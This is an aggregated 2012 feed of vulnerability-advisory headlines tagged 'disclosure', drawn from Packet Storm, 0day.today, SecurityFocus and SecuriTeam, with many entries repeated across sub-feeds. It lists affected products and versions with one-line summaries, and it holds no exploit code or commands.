Legrand-003598 / Bticino-F454 SCS web gateways both suffer from a remote credential disclosure vulnerability. Firmware 1.00.26 is affected.
Tags: disclosure credential legrand web-gateways bticino vulnerability

0:14
Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
» ‎ Packet Storm Security Exploits

WordPress Social Discussions plugin version 6.1.1 suffers from local file inclusion, path disclosure, and remote file inclusion vulnerabilities.
Tags: wordpress inclusion file social-discussions disclosure

0:14
Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
» ‎ Packet Storm Security Recent Files

WordPress Social Discussions plugin version 6.1.1 suffers from local file inclusion, path disclosure, and remote file inclusion vulnerabilities.
Tags: wordpress inclusion file social-discussions disclosure

0:14
Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
» ‎ Packet Storm Security Misc. Files

WordPress Social Discussions plugin version 6.1.1 suffers from local file inclusion, path disclosure, and remote file inclusion vulnerabilities.
Tags: wordpress inclusion file social-discussions disclosure

0:12
WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure
» ‎ Packet Storm Security Exploits

WordPress Slideshow plugin versions 2.1.12 and below suffer from cross site scripting and path disclosure vulnerabilities.
Tags: cross wordpress slideshow disclosure

0:12
WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure
» ‎ Packet Storm Security Recent Files

WordPress Slideshow plugin versions 2.1.12 and below suffer from cross site scripting and path disclosure vulnerabilities.
Tags: cross wordpress slideshow disclosure

0:12
WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure
» ‎ Packet Storm Security Misc. Files

WordPress Slideshow plugin versions 2.1.12 and below suffer from cross site scripting and path disclosure vulnerabilities.
Tags: cross wordpress slideshow disclosure

October 17, 2012
14:00
[web applications] - Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure
Tags: social wordpress web social-discussions web-applications disclosure
14:00
[web applications] - WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure
Tags: cross wordpress slideshow web-applications disclosure
14:00
[web applications] - Legrand-003598 / Bticino-F454 Credential Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Legrand-003598 / Bticino-F454 Credential Disclosure
Tags: web application bticino web-applications disclosure

12:22
Symphony CMS 2.3 XSS / SQL Injection / Disclosure
» ‎ Packet Storm Security Exploits

Symphony CMS version 2.3 suffers from cross site scripting, path disclosure, remote shell upload, token brute force, and remote SQL injection vulnerabilities.
Tags: disclosure symphony cms remote-shell brute-force

October 16, 2012
14:00
[Web applications] - Visual Tools DVR Command Injection / Password Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[Web applications] - Visual Tools DVR Command Injection / Password Disclosure
Tags: Tools visual web visual-tools web-applications disclosure
14:00
[web applications] - Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
Tags: web videosmate organizer web-applications authentication disclosure

4:11
Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
» ‎ Packet Storm Security Exploits

Videosmate Organizer version 4.2 suffers from authentication bypass and path disclosure vulnerabilities.
Tags: authentication videosmate organizer organizer-version disclosure

4:11
Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
» ‎ Packet Storm Security Recent Files

Videosmate Organizer version 4.2 suffers from authentication bypass and path disclosure vulnerabilities.
Tags: authentication videosmate organizer organizer-version disclosure

4:11
Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
» ‎ Packet Storm Security Misc. Files

Videosmate Organizer version 4.2 suffers from authentication bypass and path disclosure vulnerabilities.
Tags: authentication videosmate organizer organizer-version disclosure

1:44
Joomla iCagenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Exploits

The Joomla iCagenda component suffers from remote blind SQL injection and path disclosure vulnerabilities.
Tags: icagenda sql joomla sql-injection disclosure

1:44
Joomla iCagenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Recent Files

The Joomla iCagenda component suffers from remote blind SQL injection and path disclosure vulnerabilities.
Tags: icagenda sql joomla sql-injection disclosure

1:44
Joomla iCagenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Misc. Files

The Joomla iCagenda component suffers from remote blind SQL injection and path disclosure vulnerabilities.
Tags: icagenda sql joomla sql-injection disclosure

October 15, 2012
18:32
Visual Tools DVR Command Injection / Password Disclosure
» ‎ Packet Storm Security Exploits

Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
Tags: visual disclosure password visual-tools password-log

18:32
Visual Tools DVR Command Injection / Password Disclosure
» ‎ Packet Storm Security Recent Files

Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
Tags: visual disclosure password visual-tools password-log

18:32
Visual Tools DVR Command Injection / Password Disclosure
» ‎ Packet Storm Security Misc. Files

Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
Tags: visual disclosure password visual-tools password-log

14:00
[Web applications] - airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[Web applications] - airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection Vulnerability
Tags: readfile web airvisionnvr web-applications vulnerability disclosure

0:00
Vuln: AjaXplorer Remote Command Injection and Local File Disclosure Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

AjaXplorer Remote Command Injection and Local File Disclosure Vulnerabilities
Tags: ajaxplorer remote command disclosure

October 13, 2012
4:11
airVisionNVR 1.1.13 Disclosure / SQL Injection
» ‎ Packet Storm Security Exploits

airVisionNVR version 1.1.13 suffers from readfile() disclosure and remote SQL injection vulnerabilities.
Tags: disclosure sql airvisionnvr

4:11
airVisionNVR 1.1.13 Disclosure / SQL Injection
» ‎ Packet Storm Security Recent Files

airVisionNVR version 1.1.13 suffers from readfile() disclosure and remote SQL injection vulnerabilities.
Tags: disclosure sql airvisionnvr

4:11
airVisionNVR 1.1.13 Disclosure / SQL Injection
» ‎ Packet Storm Security Misc. Files

airVisionNVR version 1.1.13 suffers from readfile() disclosure and remote SQL injection vulnerabilities.
Tags: disclosure sql airvisionnvr

October 11, 2012
5:12
FileContral 1.0 File Disclosure / Local File Inclusion
» ‎ Packet Storm Security Exploits

FileContral version 1.0 suffers from file disclosure and local file inclusion vulnerabilities.
Tags: disclosure filecontral file inclusion

5:12
FileContral 1.0 File Disclosure / Local File Inclusion
» ‎ Packet Storm Security Recent Files

FileContral version 1.0 suffers from file disclosure and local file inclusion vulnerabilities.
Tags: disclosure filecontral file inclusion

5:12
FileContral 1.0 File Disclosure / Local File Inclusion
» ‎ Packet Storm Security Misc. Files

FileContral version 1.0 suffers from file disclosure and local file inclusion vulnerabilities.
Tags: disclosure filecontral file inclusion

October 10, 2012
23:49
Drupal Mandrill 7.x Information Disclosure
» ‎ Packet Storm Security Advisories

Drupal Mandrill third party module version 7.x suffers from an information disclosure vulnerability.
Tags: disclosure drupal information mandrill information-disclosure-vulnerability third-party

23:49
Drupal Mandrill 7.x Information Disclosure
» ‎ Packet Storm Security Recent Files

Drupal Mandrill third party module version 7.x suffers from an information disclosure vulnerability.
Tags: disclosure drupal information mandrill information-disclosure-vulnerability third-party

23:49
Drupal Mandrill 7.x Information Disclosure
» ‎ Packet Storm Security Misc. Files

Drupal Mandrill third party module version 7.x suffers from an information disclosure vulnerability.
Tags: disclosure drupal information mandrill information-disclosure-vulnerability third-party

October 09, 2012
8:00
Bugtraq: Team SHATTER Security Advisory: XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2
» ‎ SecurityFocus Vulnerabilities

Team SHATTER Security Advisory: XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2
Tags: wrap team cfg vulnerability disclosure

October 07, 2012
14:00
[Web applications] - Cims empdata.mdb Database Disclosure Exploit
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[Web applications] - Cims empdata.mdb Database Disclosure Exploit
Tags: web-applications disclosure

October 03, 2012
16:33
phpMyBitTorrent 2.04 SQL Injection / Local File Inclusion
» ‎ Packet Storm Security Exploits

phpMyBitTorrent version 2.04 suffers from insecure cache handling, remote file disclosure, local file inclusion, and remote SQL injection vulnerabilities.
Tags: file phpmybittorrent sql inclusion disclosure

16:33
phpMyBitTorrent 2.04 SQL Injection / Local File Inclusion
» ‎ Packet Storm Security Recent Files

phpMyBitTorrent version 2.04 suffers from insecure cache handling, remote file disclosure, local file inclusion, and remote SQL injection vulnerabilities.
Tags: file phpmybittorrent sql inclusion disclosure

16:33
phpMyBitTorrent 2.04 SQL Injection / Local File Inclusion
» ‎ Packet Storm Security Misc. Files

phpMyBitTorrent version 2.04 suffers from insecure cache handling, remote file disclosure, local file inclusion, and remote SQL injection vulnerabilities.
Tags: file phpmybittorrent sql inclusion disclosure

September 25, 2012
14:00
[web applications] - Drupal 7.15 Path Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Drupal 7.15 Path Disclosure Vulnerability
Tags: path web drupal web-applications vulnerability disclosure

September 24, 2012
3:11
Drupal 7.15 Path Disclosure
» ‎ Packet Storm Security Exploits

Drupal version 7.15 suffers from multiple path disclosure vulnerabilities.
Tags: path disclosure drupal

September 18, 2012
11:00
Bugtraq: NGS00265 Patch Notification: Symantec Messaging Gateway - Unauthenticated detailed version disclosure
» ‎ SecurityFocus Vulnerabilities

NGS00265 Patch Notification: Symantec Messaging Gateway - Unauthenticated detailed version disclosure
Tags: notification ngs patch disclosure symantec

7:44
WordPress 3.4.2 User Enumeration / Path Disclosure
» ‎ Packet Storm Security Exploits

WordPress version 3.4.2 appears to suffer from user enumeration and path disclosure vulnerabilities.
Tags: enumeration wordpress user disclosure

7:44
WordPress 3.4.2 User Enumeration / Path Disclosure
» ‎ Packet Storm Security Recent Files

WordPress version 3.4.2 appears to suffer from user enumeration and path disclosure vulnerabilities.
Tags: enumeration wordpress user disclosure

7:44
WordPress 3.4.2 User Enumeration / Path Disclosure
» ‎ Packet Storm Security Misc. Files

WordPress version 3.4.2 appears to suffer from user enumeration and path disclosure vulnerabilities.
Tags: enumeration wordpress user disclosure

5:11
WordPress Author Name Disclosure
» ‎ Packet Storm Security Exploits

A simple request to WordPress discloses a given author's name in the title when you enumerate values for author=.
Tags: wordpress author name simple-request author-name disclosure

5:11
WordPress Author Name Disclosure
» ‎ Packet Storm Security Recent Files

A simple request to WordPress discloses a given author's name in the title when you enumerate values for author=.
Tags: wordpress author name simple-request author-name disclosure

5:11
WordPress Author Name Disclosure
» ‎ Packet Storm Security Misc. Files

A simple request to WordPress discloses a given author's name in the title when you enumerate values for author=.
Tags: wordpress author name simple-request author-name disclosure

0:00
Vuln: Apple Remote Desktop CVE-2012-0681 Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apple Remote Desktop CVE-2012-0681 Information Disclosure Vulnerability
Tags: desktop disclosure information apple-remote apple-remote-desktop information-disclosure-vulnerability

September 17, 2012
12:28
TorrentTrader 2.08 XSS / Directory Traversal / Bypass
» ‎ Packet Storm Security Exploits

TorrentTrader version 2.08 suffers from authorization bypass, cross site scripting, path disclosure, and directory traversal vulnerabilities.
Tags: directory traversal torrenttrader cross-site-scripting disclosure

12:28
TorrentTrader 2.08 XSS / Directory Traversal / Bypass
» ‎ Packet Storm Security Recent Files

TorrentTrader version 2.08 suffers from authorization bypass, cross site scripting, path disclosure, and directory traversal vulnerabilities.
Tags: directory traversal torrenttrader cross-site-scripting disclosure

12:28
TorrentTrader 2.08 XSS / Directory Traversal / Bypass
» ‎ Packet Storm Security Misc. Files

TorrentTrader version 2.08 suffers from authorization bypass, cross site scripting, path disclosure, and directory traversal vulnerabilities.
Tags: directory traversal torrenttrader cross-site-scripting disclosure

11:39
LuxCal 2.7.0 XSS / LFI / Information Disclosure
» ‎ Packet Storm Security Exploits

LuxCal version 2.7.0 suffers from cross site scripting, information disclosure, and local file inclusion vulnerabilities.
Tags: disclosure luxcal information information-disclosure inclusion

11:39
LuxCal 2.7.0 XSS / LFI / Information Disclosure
» ‎ Packet Storm Security Recent Files

LuxCal version 2.7.0 suffers from cross site scripting, information disclosure, and local file inclusion vulnerabilities.
Tags: disclosure luxcal information information-disclosure inclusion

11:39
LuxCal 2.7.0 XSS / LFI / Information Disclosure
» ‎ Packet Storm Security Misc. Files

LuxCal version 2.7.0 suffers from cross site scripting, information disclosure, and local file inclusion vulnerabilities.
Tags: disclosure luxcal information information-disclosure inclusion

September 15, 2012
14:00
[web applications] - osCommerce Remote Database Disclosure Vulnerability
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - osCommerce Remote Database Disclosure Vulnerability
Tags: oscommerce web remote web-applications vulnerability disclosure
September 13, 2012
14:00
[web applications] - Wordpress 3.X.X and prior - Path Disclosure/File Inclusion Vulnerabilities
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Wordpress 3.X.X and prior - Path Disclosure/File Inclusion Vulnerabilities
Tags: path wordpress web x.x web-applications disclosure inclusion

September 12, 2012
3:11
WordPress Tierra Audio Path Disclosure
» ‎ Packet Storm Security Exploits

WordPress Tierra Audio third party plugin suffers from full path disclosure and directory listing vulnerabilities. Note that this finding houses site-specific data.
Tags: audio tierra wordpress party-plugin audio-path disclosure

3:11
WordPress Tierra Audio Path Disclosure
» ‎ Packet Storm Security Recent Files

WordPress Tierra Audio third party plugin suffers from full path disclosure and directory listing vulnerabilities. Note that this finding houses site-specific data.
Tags: audio tierra wordpress party-plugin audio-path disclosure

3:11
WordPress Tierra Audio Path Disclosure
» ‎ Packet Storm Security Misc. Files

WordPress Tierra Audio third party plugin suffers from full path disclosure and directory listing vulnerabilities. Note that this finding houses site-specific data.
Tags: audio tierra wordpress party-plugin audio-path disclosure

September 10, 2012
16:22
Akcms 4.2.4 Information Disclosure
» ‎ Packet Storm Security Exploits

Akcms version 4.2.4 suffers from an information disclosure vulnerability due to the installation log with credentials being left accessible in the webroot.
Tags: disclosure akcms information information-disclosure-vulnerability webroot credentials

16:22
Akcms 4.2.4 Information Disclosure
» ‎ Packet Storm Security Recent Files

Akcms version 4.2.4 suffers from an information disclosure vulnerability due to the installation log with credentials being left accessible in the webroot.
Tags: disclosure akcms information information-disclosure-vulnerability webroot credentials

16:22
Akcms 4.2.4 Information Disclosure
» ‎ Packet Storm Security Misc. Files

Akcms version 4.2.4 suffers from an information disclosure vulnerability due to the installation log with credentials being left accessible in the webroot.
Tags: disclosure akcms information information-disclosure-vulnerability webroot credentials

September 05, 2012
14:00
[webapps / 0day] - QNAP Turbo NAS 3.7.3 File Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[webapps / 0day] - QNAP Turbo NAS 3.7.3 File Disclosure
Tags: qnap day webapps disclosure
14:00
[web applications] - QNAP Turbo NAS 3.7.3 File Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - QNAP Turbo NAS 3.7.3 File Disclosure
Tags: qnap web turbo web-applications disclosure

September 04, 2012
19:52
QNAP Turbo NAS 3.7.3 File Disclosure
» ‎ Packet Storm Security Exploits

QNAP Turbo NAS versions 3.7.3 build 20120801 and below suffer from arbitrary file read and modify vulnerabilities.
Tags: qnap nas turbo disclosure

19:52
QNAP Turbo NAS 3.7.3 File Disclosure
» ‎ Packet Storm Security Recent Files

QNAP Turbo NAS versions 3.7.3 build 20120801 and below suffer from arbitrary file read and modify vulnerabilities.
Tags: qnap nas turbo disclosure

19:52
QNAP Turbo NAS 3.7.3 File Disclosure
» ‎ Packet Storm Security Misc. Files

QNAP Turbo NAS versions 3.7.3 build 20120801 and below suffer from arbitrary file read and modify vulnerabilities.
Tags: qnap nas turbo disclosure

September 03, 2012
18:45
Splunk 4.3.3 Arbitrary File Disclosure
» ‎ Packet Storm Security Exploits

Splunk versions 4.3.3 and below suffer from a remote file content disclosure vulnerability.
Tags: disclosure splunk file vulnerability

18:45
Splunk 4.3.3 Arbitrary File Disclosure
» ‎ Packet Storm Security Recent Files

Splunk versions 4.3.3 and below suffer from a remote file content disclosure vulnerability.
Tags: disclosure splunk file vulnerability

18:45
Splunk 4.3.3 Arbitrary File Disclosure
» ‎ Packet Storm Security Misc. Files

Splunk versions 4.3.3 and below suffer from a remote file content disclosure vulnerability.
Tags: disclosure splunk file vulnerability

August 31, 2012
14:00
[webapps / 0day] - Joomla Component com_icagenda Blind SQLi/Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[webapps / 0day] - Joomla Component com_icagenda Blind SQLi/Path Disclosure
Tags: day com webapps disclosure
14:00
[web applications] - Joomla Component com_icagenda Blind SQLi/Path Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Joomla Component com_icagenda Blind SQLi/Path Disclosure
Tags: web com application web-applications disclosure

8:55
Joomla ICAgenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Exploits

The Joomla ICAgenda component suffers from remote blind SQL injection and path disclosure vulnerabilities. Note that this finding houses site-specific data.
Tags: icagenda sql joomla sql-injection disclosure

8:55
Joomla ICAgenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Recent Files

The Joomla ICAgenda component suffers from remote blind SQL injection and path disclosure vulnerabilities. Note that this finding houses site-specific data.
Tags: icagenda sql joomla sql-injection disclosure

8:55
Joomla ICAgenda SQL Injection / Path Disclosure
» ‎ Packet Storm Security Misc. Files

The Joomla ICAgenda component suffers from remote blind SQL injection and path disclosure vulnerabilities. Note that this finding houses site-specific data.
Tags: icagenda sql joomla sql-injection disclosure

4:12
WordPress BBPress SQL Injection / Path Disclosure
» ‎ Packet Storm Security Exploits

The WordPress BBPress third party plugin suffers from path disclosure and remote SQL injection vulnerabilities.
Tags: wordpress sql bbpress party-plugin sql-injection disclosure

4:12
WordPress BBPress SQL Injection / Path Disclosure
» ‎ Packet Storm Security Recent Files

The WordPress BBPress third party plugin suffers from path disclosure and remote SQL injection vulnerabilities.
Tags: wordpress sql bbpress party-plugin sql-injection disclosure

4:12
WordPress BBPress SQL Injection / Path Disclosure
» ‎ Packet Storm Security Misc. Files

The WordPress BBPress third party plugin suffers from path disclosure and remote SQL injection vulnerabilities.
Tags: wordpress sql bbpress party-plugin sql-injection disclosure

0:00
Vuln: Rugged Operating System Private Key Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Rugged Operating System Private Key Disclosure Vulnerability
Tags: rugged system operating vulnerability disclosure operating-system

August 29, 2012
20:02
Sistem Biwes SQL Injection / Path Disclosure
» ‎ Packet Storm Security Exploits

Sistem Biwes suffers from remote SQL injection and path disclosure vulnerabilities.
Tags: sistem sql biwes sql-injection disclosure

20:02
Sistem Biwes SQL Injection / Path Disclosure
» ‎ Packet Storm Security Recent Files

Sistem Biwes suffers from remote SQL injection and path disclosure vulnerabilities.
Tags: sistem sql biwes sql-injection disclosure

20:02
Sistem Biwes SQL Injection / Path Disclosure
» ‎ Packet Storm Security Misc. Files

Sistem Biwes suffers from remote SQL injection and path disclosure vulnerabilities.
Tags: sistem sql biwes sql-injection disclosure

August 28, 2012
14:00
[webapps / 0day] - Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[webapps / 0day] - Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure
Tags: grab conceptronic day storage-center disclosure
14:00
[web applications] - Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[web applications] - Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure
Tags: grab conceptronic web storage-center web-applications disclosure

0:00
Vuln: WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
Tags: wordpress file cloudsafe vulnerability disclosure

August 27, 2012
20:47
Conceptronic Password Disclosure
» ‎ Packet Storm Security Exploits

Conceptronic Grab'n'Go and Sitecom Storage Center suffers from a password disclosure vulnerability.
Tags: disclosure conceptronic password password-disclosure storage-center vulnerability

20:47
Conceptronic Password Disclosure
» ‎ Packet Storm Security Recent Files

Conceptronic Grab'n'Go and Sitecom Storage Center suffers from a password disclosure vulnerability.
Tags: disclosure conceptronic password password-disclosure storage-center vulnerability

20:47
Conceptronic Password Disclosure
» ‎ Packet Storm Security Misc. Files

Conceptronic Grab'n'Go and Sitecom Storage Center suffers from a password disclosure vulnerability.
Tags: disclosure conceptronic password password-disclosure storage-center vulnerability

4:11
Paliz CMS Path Disclosure
» ‎ Packet Storm Security Exploits

Paliz CMS suffers from a path disclosure vulnerability.
Tags: path paliz cms vulnerability disclosure

4:11
Paliz CMS Path Disclosure
» ‎ Packet Storm Security Recent Files

Paliz CMS suffers from a path disclosure vulnerability.
Tags: path paliz cms vulnerability disclosure

4:11
Paliz CMS Path Disclosure
» ‎ Packet Storm Security Misc. Files

Paliz CMS suffers from a path disclosure vulnerability.
Tags: path paliz cms vulnerability disclosure

3:11
Douran CMS Path Disclosure
» ‎ Packet Storm Security Exploits

Douran CMS suffers from a path disclosure vulnerability.
Tags: from disclosure suffers vulnerability cms

3:11
Douran CMS Path Disclosure
» ‎ Packet Storm Security Recent Files

Douran CMS suffers from a path disclosure vulnerability.
Tags: from disclosure suffers vulnerability cms

3:11
Douran CMS Path Disclosure
» ‎ Packet Storm Security Misc. Files

Douran CMS suffers from a path disclosure vulnerability.
Tags: from disclosure suffers vulnerability cms

August 25, 2012
22:40
Zend Framework Information Disclosure
» ‎ Packet Storm Security Exploits

Zend Framework suffers from a SQL configuration file disclosure vulnerability.
Tags: disclosure zend framework information-disclosure zend-framework configuration-file

22:40
Zend Framework Information Disclosure
» ‎ Packet Storm Security Recent Files

Zend Framework suffers from a SQL configuration file disclosure vulnerability.
Tags: disclosure zend framework information-disclosure zend-framework configuration-file

22:40
Zend Framework Information Disclosure
» ‎ Packet Storm Security Misc. Files

Zend Framework suffers from a SQL configuration file disclosure vulnerability.
Tags: disclosure zend framework information-disclosure zend-framework configuration-file

August 19, 2012
17:00
MyBB Versions Prior to 1.6.7 Multiple Security Vulnerabilities UPDATED
» ‎ SecuriTeam

MyBB is prone to multiple security vulnerabilities including: 1. Multiple SQL-injection vulnerabilities 2. A cross-site scripting vulnerability 3. A path-disclosure vulnerability
Tags: multiple mybb security sql-injection vulnerability disclosure
17:00
WordPress ShareYourCart plugin Path-Disclosure Vulnerability UPDATED
» ‎ SecuriTeam

The ShareYourCart plugin for WordPress is vulnerable to a path-disclosure vulnerability.
Tags: plugin shareyourcart wordpress vulnerability disclosure
August 18, 2012
17:00
Apple Mac OS X Multiple Information Disclosure Vulnerabilities UPDATED
» ‎ SecuriTeam

Apple Mac OS X is prone to multiple information-disclosure vulnerabilities.
Tags: vulnerabilities disclosure information x-multiple apple-mac-os apple-mac-os-x mac-os-x
17:00
Apple QuickTime Information Disclosure Vulnerability UPDATED
» ‎ SecuriTeam

Apple Quicktime is prone to an information-disclosure vulnerability.
Tags: disclosure vulnerability information apple-quicktime information-disclosure-vulnerability

August 17, 2012
7:14
WeBid 1.0.4 RFI / File Disclosure / SQL Injection
» ‎ Packet Storm Security Exploits

WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.
Tags: disclosure webid file inclusion

7:14
WeBid 1.0.4 RFI / File Disclosure / SQL Injection
» ‎ Packet Storm Security Recent Files

WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.
Tags: disclosure webid file inclusion

7:14
WeBid 1.0.4 RFI / File Disclosure / SQL Injection
» ‎ Packet Storm Security Misc. Files

WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.
Tags: disclosure inclusion webid

0:00
Vuln: Gypsy Information Disclosure and Buffer Overflow Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Gypsy Information Disclosure and Buffer Overflow Vulnerabilities
Tags: disclosure buffer overflow gypsy-information information-disclosure buffer-overflow-vulnerabilities gypsy
0:00
Vuln: Apple QuickTime CVE-2011-3220 Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apple QuickTime CVE-2011-3220 Information Disclosure Vulnerability
Tags: disclosure vulnerability information apple-quicktime information-disclosure-vulnerability cve
0:00
Vuln: Apple Mac OS X Multiple Information Disclosure Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Apple Mac OS X Multiple Information Disclosure Vulnerabilities
Tags: vulnerabilities disclosure information x-multiple apple-mac-os apple-mac-os-x mac-os-x
August 16, 2012
0:00
Vuln: WordPress ShareYourCart plugin Path-Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

WordPress ShareYourCart plugin Path-Disclosure Vulnerability
Tags: plugin shareyourcart wordpress vulnerability disclosure

August 13, 2012
17:00
Cisco IOS Information Disclosure Vulnerability
» ‎ SecuriTeam

Cisco IOS is prone to an information-disclosure vulnerability.
Tags: disclosure vulnerability information cisco-ios information-disclosure-vulnerability cisco
17:00
meetOneToGo Plaintext Credentials Information Disclosure Vulnerability
» ‎ SecuriTeam

meetOneToGo is prone to an information disclosure vulnerability.
Tags: disclosure meetonetogo information information-disclosure-vulnerability credentials
17:00
WordPress Vitamin Plugin 'path' Parameter Multiple Remote File Disclosure Vulnerabilities
» ‎ SecuriTeam

The Vitamin plugin for WordPress is prone to multiple file-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
Tags: plugin wordpress vitamin path-parameter multiple-file disclosure

August 09, 2012
14:00
[webapps / 0day] - Kamads classifieds V2 admin Disclosure / AuthBypass exploit
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[webapps / 0day] - Kamads classifieds V2 admin Disclosure / AuthBypass exploit
Tags: day kamads admin disclosure

August 08, 2012
19:38
School Management System 1.0 Password / Backup Disclosure
» ‎ Packet Storm Security Exploits

School Management System version 1.0 suffers from credential and backup disclosure vulnerabilities.
Tags: system school management school-management-system system-1 disclosure

19:38
School Management System 1.0 Password / Backup Disclosure
» ‎ Packet Storm Security Recent Files

School Management System version 1.0 suffers from credential and backup disclosure vulnerabilities.
Tags: system school management school-management-system system-1 disclosure

19:38
School Management System 1.0 Password / Backup Disclosure
» ‎ Packet Storm Security Misc. Files

School Management System version 1.0 suffers from credential and backup disclosure vulnerabilities.
Tags: system school management school-management-system system-1 disclosure

August 05, 2012
9:22
GetSimple CMS 3.1.2 Local File Inclusion / Path Disclosure
» ‎ Packet Storm Security Exploits

GetSimple CMS version 3.1.2 suffers from local file inclusion and path disclosure vulnerabilities.
Tags: getsimple file cms disclosure inclusion
9:22
GetSimple CMS 3.1.2 Local File Inclusion / Path Disclosure
» ‎ Packet Storm Security Exploits

GetSimple CMS version 3.1.2 suffers from local file inclusion and path disclosure vulnerabilities.
Tags: getsimple file cms disclosure inclusion

August 03, 2012
0:00
Vuln: Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
Tags: module naxsi nginx vulnerability disclosure
August 02, 2012
0:00
Vuln: Drupal Core Path Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Drupal Core Path Disclosure Vulnerability
Tags: core-path vulnerability disclosure

August 01, 2012
17:00
Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
» ‎ SecuriTeam

The Naxsi Module for Nginx is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
Tags: module naxsi nginx vulnerability disclosure
July 29, 2012
17:00
Movable Type Unspecified Local File Disclosure Vulnerability
» ‎ SecuriTeam

Movable Type is prone to an unspecified local file-disclosure vulnerability.
Tags: movable vulnerability type movable-type disclosure
July 28, 2012
17:00
WordPress UnGallery 'zip' Parameter Local File Disclosure Vulnerability
» ‎ SecuriTeam

The UnGallery plug-in for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Tags: vulnerability wordpress ungallery disclosure

July 26, 2012
5:12
PHP UnZIP 0.1 File Disclosure
» ‎ Packet Storm Security Exploits

PHP UnZIP version 0.1 suffers from a remote disclosure vulnerability. Note that this finding houses site-specific data.
Tags: disclosure php unzip vulnerability-note

July 24, 2012
14:00
[webapps / 0day] - Nessus On Android 1.0.1 Credential Disclosure
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

[webapps / 0day] - Nessus On Android 1.0.1 Credential Disclosure
Tags: day android nessus disclosure

July 23, 2012
15:02
Nessus On Android 1.0.1 Credential Disclosure
» ‎ Packet Storm Security Exploits

Nessus version 1.0.1 for Android stores the username and password in cleartext.
Tags: credential android nessus disclosure

15:02
Nessus On Android 1.0.1 Credential Disclosure
